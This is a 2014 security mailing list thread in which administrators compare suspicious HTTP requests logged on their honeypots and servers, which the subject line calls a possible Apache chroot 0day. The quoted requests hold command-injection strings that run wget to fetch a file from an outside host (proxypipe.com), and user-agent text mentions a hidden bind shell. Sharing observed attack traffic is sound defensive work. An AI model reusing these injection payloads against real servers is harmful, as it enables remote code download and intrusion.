PaulDotCom mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [Security Weekly] apache chroot 0day?

From: Bruno Savioli <bruno () savioli org>
Date: Tue, 29 Jul 2014 09:44:04 +0100
I got the same on 7 different servers.
Plus, I also had this, from the same IP on 25/06 on 3 of my servers:

GET /rutorrent HTTP/1.0 User-Agent: Chrome 14.2.0 Mozilla (Gecko)Accept: */*

Bruno


On 29 July 2014 08:05, Lutz Schildt <ls () lsmooth de> wrote:


Am 28.07.2014 21:26, schrieb Lutz Schildt:

 I've seen the same request on one of my honeypots and a second one a few

hours later from the same IP:


GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget
proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x06

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com


Another one:

GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget
proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com





-- 
- Bruno

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
Previous By Date Next
Previous By Thread Next

Current thread: